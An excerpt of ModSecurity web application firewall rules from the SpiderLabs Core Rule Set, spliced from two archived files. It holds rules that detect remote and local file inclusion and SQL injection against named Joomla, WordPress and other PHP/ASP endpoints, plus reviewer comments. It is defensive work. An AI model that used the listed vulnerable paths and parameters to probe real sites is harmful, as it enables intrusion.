inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012995) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012995,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_people" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013087) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS impressCMS FCKeditor root_path Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /editors/FCKeditor/editor_registry.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013087,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS impressCMS FCKeditor root_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS impressCMS FCKeditor root_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013088) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS impressCMS tinymce root_path Parameter Remote File 
inclusion Attempt SecRule REQUEST_LINE "@contains /editors/tinymce/editor_registry.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013088,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS impressCMS tinymce root_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS impressCMS tinymce root_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013089) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS impressCMS dhtmltextarea root_path Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /editors/dhtmltextarea/editor_registry.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013089,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS impressCMS dhtmltextarea root_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS impressCMS dhtmltextarea root_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013308) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013308,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy 
Plugin page Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013309,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013433,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jfeedback" "chain" SecRule ARGS:controller "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jfeedback 
Component controller parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/ungallery/source_vuln.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013464,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pic "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013465) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasySiteEdit langval Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /sublink.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013465,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS EasySiteEdit langval Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:langval/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasySiteEdit langval Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013466) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DiY-CMS lang Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /modules/guestbook/blocks/control.block.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013466,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DiY-CMS lang Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DiY-CMS lang Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_RFI_RULES ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_sqli_attacks.conf������0000664�0000000�0000000�00002065016�12164572564�0033260�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# ---------------------------------------------------------------
#
# This ruleset was created by Trustwave SpiderLabs Research Team and includes data from:
#
# http://www.emergingthreats.net/
#
# Reading guide for the rules below (review notes derived from the
# directives themselves):
#
# * Rule 2000004 is a pre-filter. When REQUEST_FILENAME, after the listed
#   transformations, matches none of the phrases in
#   modsecurity_46_slr_et_sqli.data, skipAfter jumps to the
#   END_SLR_ET_SQLI_RULES marker and the rules in between are not
#   evaluated. It is nolog,pass, so it never alerts or blocks by itself.
#   NOTE(review): the data file is not shown here; presumably it lists the
#   script paths used below. A path missing from it silently disables the
#   corresponding rule, so keep the two in sync.
#
# * Every detection is a chained rule. The first SecRule carries the
#   metadata (id, rev, msg, tag, severity:'2') and the `block` action; the
#   following links only narrow the match, and the actions of the last
#   link run only when every link matched. What `block` does at run time
#   is decided by SecDefaultAction, which is outside this section.
#
# * The first link is a substring test (@contains) of the script path
#   against the whole REQUEST_LINE, which includes the query string.
#
# * The last link, &TX:'/SQL_INJECTION.*ARGS:<param>/' "@gt 0", counts TX
#   variables whose name matches that regex. These rules carry no SQL
#   pattern of their own: they match only when something earlier in the
#   transaction already recorded a SQL_INJECTION entry for that parameter.
#   NOTE(review): presumably the generic CRS SQL injection rules create
#   those TX entries - confirm that they are loaded and run before this
#   file, otherwise none of these rules can match.
#
# * On a full match the last link adds part E to the audit log parts of
#   the transaction, sets tx.msg, raises tx.anomaly_score by
#   tx.critical_anomaly_score and stores the matched value under
#   tx.<rule id>-WEB_ATTACK/SQL_INJECTION-<matched variable name>.
#
SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_sqli.data" "id:'2000004',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_SQLI_RULES"

# (2011219) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Campsite article_id Parameter UPDATE SET SQL Injection Attempt
# Three-link chain: script path, then "GET " somewhere in the request line,
# then a prior SQL_INJECTION entry for ARGS:article_id.
# NOTE(review): "@contains GET " is an unanchored substring test, not a check
# of the method token, and a request line without "GET " is never tagged by
# this rule; such requests rely on the generic rules alone. REQUEST_METHOD
# would state a method check precisely.
SecRule REQUEST_LINE "@contains /plugins/campsiteattachment/attachments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011219,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Campsite article_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/SQL_INJECTION.*ARGS:article_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Campsite article_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Rules 2007515 to 2007563: nine two-link chains for /vehiclelistings.asp
# (reference tag www.securityfocus.com/bid/21154). They differ only in id,
# msg and the parameter named in the last link. None of them has a method
# link, so the request method does not affect the match.

# (2007515) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp categoryID_list UPDATE
SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007515,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp categoryID_list UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:categoryID_list/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp categoryID_list UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007521) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp sale_type UPDATE
SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007521,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp sale_type UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:sale_type/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp sale_type UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007527) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp stock_number UPDATE
SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007527,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp stock_number UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:stock_number/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp stock_number UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007533) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp manufacturer UPDATE
SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007533,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp manufacturer UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:manufacturer/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp manufacturer UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007539) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp model UPDATE
SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007539,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp model UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:model/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp model UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007545) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID UPDATE
SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007545,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:vehicleID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007551) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp year UPDATE
SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007551,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp year UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:year/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp year UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007557) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vin UPDATE
SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007557,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vin UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:vin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vin UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp listing_price UPDATE
SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007563,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp listing_price UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:listing_price/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp listing_price UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004064) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php rating UPDATE
# Two-link chain: script path /includes/rating.php, then a prior
# SQL_INJECTION entry for ARGS:rating. No method link.
SecRule REQUEST_LINE "@contains /includes/rating.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004064,rev:8,msg:'SLR: ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php rating UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469351/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:rating/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php rating UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004076) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php post_id UPDATE
# Review notes for the chains below (the description of rule 2004076 is the
# comment that ends the previous line of this listing).
# - Each chain starter matches REQUEST_LINE against a literal path with
#   @contains; the chained rule counts TX variables whose names match the
#   regex (the leading "&") and fires when the count is greater than 0.
# - Nothing here inspects the argument value itself. The TX entries are
#   presumably written by the generic SQL injection rules that run earlier;
#   confirm that those rules are loaded before these chains.
# - NOTE(review): @contains is case-sensitive and the transformation list has
#   no t:lowercase, so a path written in a different case is not matched.
#   That matters for the .asp target if the server treats paths
#   case-insensitively -- verify for the deployment.
# - NOTE(review): the TX name regex has no end anchor, so ARGS:id also counts
#   entries recorded for longer names such as ARGS:id_mod.
SecRule REQUEST_LINE "@contains /includes/rating.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004076,rev:8,msg:'SLR: ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php post_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469351/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:post_id/' "@gt 0" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007222) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 8pixel.net simpleblog SQL Injection Attempt -- edit.asp id UPDATE
SecRule REQUEST_LINE "@contains /admin/edit.asp" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007222,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 8pixel.net simpleblog SQL Injection Attempt -- edit.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2853'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 8pixel.net simpleblog SQL Injection Attempt -- edit.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005062) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UPDATE
# Split by the listing: the msg string of the next rule continues on the following line.
SecRule REQUEST_LINE "@contains /templates/modif.html" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005062,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod 
UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0388'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_mod/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005578) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_authorization.php xuser_name UPDATE SecRule REQUEST_LINE "@contains /shared/code/cp_authorization.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005578,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_authorization.php xuser_name UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22032'" SecRule &TX:'/SQL_INJECTION.*ARGS:xuser_name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_authorization.php xuser_name UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005584) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_downloads.php did UPDATE SecRule REQUEST_LINE "@contains /public/code/cp_downloads.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005584,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_downloads.php did UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22032'" SecRule &TX:'/SQL_INJECTION.*ARGS:did/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control 
